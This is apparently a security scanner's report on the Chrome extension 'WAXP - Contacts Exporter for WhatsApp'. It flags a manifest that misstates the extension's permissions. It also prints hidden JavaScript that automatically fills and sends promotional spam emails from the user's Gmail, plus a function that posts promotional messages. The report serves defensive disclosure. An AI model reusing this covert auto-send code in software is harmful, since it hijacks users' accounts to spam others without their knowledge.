Security Warning: High Security Risk
WAXP - Contacts Exporter for WhatsApp
ID: jpkhnmgaiachojobpgbfilkkjecgldle
Supported Languages
Extension Info & Metadata
Publisher Contextual Analysis
- Author: So Lets Talk Digital
- Country: IN
- MX records exist: Yes
- Domain exists: Yes
- Is disposable: No
- Is role-based: No
- Mailbox exists: Yes
- Address: C-25, C Block, Sector - 58 Noida, Uttar Pradesh 201301 IN
Export all or unsaved contacts from WhatsApp™ groups, chatlist and labels to CSV file.
WA Bulk Contracts Extractor Extension by SoLetsTalkDigital (also known as “SO”) lets you extract contacts from your WhatsApp easily and makes them available for download in a csv file.

This is not a Free Extension and offers Yearly and Lifetime subscription options at affordable prices for unlimited use. The subscription plans require payment that is processed by Razorpay.

If you like this chrome extension, consider sharing your review with us. Your support will help us make this extension more robust. For any issues related to the WA Contacts Extractor Extension, feel free to reach out to us on [email protected].

DISCLAIMER: This Chrome plugin is not endorsed or certified by WhatsApp Inc and is merely an unofficial enhancement and automation tool that works with WhatsApp for Web.

The privacy of the users is important to us. We don’t broadcast, sell, share or distribute any user collected data. The extension was designed to keep privacy of our users in mind. For more information, read:

- SoLetsTalkDigital privacy policy: https://soletstalkapp.com/privacy
- Razorpay privacy policy: https://razorpay.com/privacy/
The bundled manifest declares MV3 with only the activeTab permission, no host_permissions, no externally_connectable, and no web_accessible_resources. The published CWS listing reports MV2 with storage, identity, identity.email, and *://api.gumroad.com/* permissions plus externally_connectable and web_accessible_resources listing client.js and libphonenumber-max.js. This is a material discrepancy: the installed extension likely operates under the published MV2 permission set, granting identity and storage access that are entirely absent from the reviewed bundle. A manifest that misrepresents its permission footprint is a high-severity integrity failure regardless of whether intent is proven.
```json
{
  "manifest_version": 3,
  "permissions": ["activeTab"],
  "background": { "service_worker": "jquery.min.js" },
  "content_scripts": [
    { "js": ["contentscript.js"], "matches": ["*://web.whatsapp.com/*"] }
  ],
  "version": "1.0.9"
}
```

This routine reads a stored list of email addresses from localStorage.allEmails, then programmatically fills Gmail's compose form (To, Subject, Body) and clicks the Send button to deliver promotional spam advertising the publisher's 'Whatsapp Bulk Marketing Software' at soletstalkdigital.com. The code executes automatically 20 seconds after page load whenever localStorage.autoGmail equals 'true'. This functionality is entirely unrelated to WhatsApp contact extraction, is not disclosed in the CWS data-collection categories, and turns the user's Gmail account into a spam delivery mechanism for the publisher's commercial products. The file is loaded into web.whatsapp.com for paid licensees via commonFindOnce.js / chrome.tabs.executeScript.
```javascript
function doSendEmail() {
  function sendGmail(to, subject, content) {
    document.getElementsByName("to")[0].value = to;
    document.getElementsByName("subject")[0].value = subject;
    document.getElementsByName("body")[0].value = content;
    findaValue("Send", "input").click();
  }
  function prepareBody(name) {
    return "Hi " + name + "\n\tI found your email on social media. Whatsapp Bulk Marketing Software is a great tool ... More info at\nhttps://soletstalkdigital.com ...";
  }
  function emailNum(num) {
    allEmails = JSON.parse(localStorage.allEmails);
    return allEmails[num];
  }
  function currentPlus() {
    localStorage.currentEmail = parseInt(localStorage.currentEmail) + 1;
  }
  var ce = emailNum(localStorage.currentEmail);
  sendGmail(ce.email, "Watch Out New Software", prepareBody(ce.name));
  currentPlus();
}

function doBoth() {
  if (findaValue("Send", "input")) {
    doSendEmail();
  } else {
    finda("Compose\u00a0Mail", "a").click();
  }
}

if (localStorage.autoGmail == "true") {
  console.log(localStorage.currentEmail);
  setTimeout(doBoth, 20000);
}
```

This function injects promotional text ('head over to https://soletstalkdigital.com') into a message compose field and clicks Send, automating outbound messaging on behalf of the publisher. While no auto-trigger for this specific function was found in the reviewed bundle, its presence alongside the auto-triggering doSendEmail/doBoth pattern in the same file demonstrates a pattern of covert promotional automation using the user's messaging accounts.
```javascript
function peperonityMessage() {
  a = finda("Write a message", "a");
  b = findaValue("Send message", "input");
  c = finda("Continue", "a");
  if (a) {
    a.click();
  } else if (b) {
    message.value = "head over to https://soletstalkdigital.com for more such software";
    b.click();
  } else if (c) {
    c.click();
  }
}
```

By severity
Versions scanned
Showing 1 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.
| Extension Version | Code Review Findings |
|---|---|
| 1.0.9 | 3 |
Files with findings
2 distinct paths — top paths by unique finding count:
- js/commonFind.js: 2
- manifest.json: 1
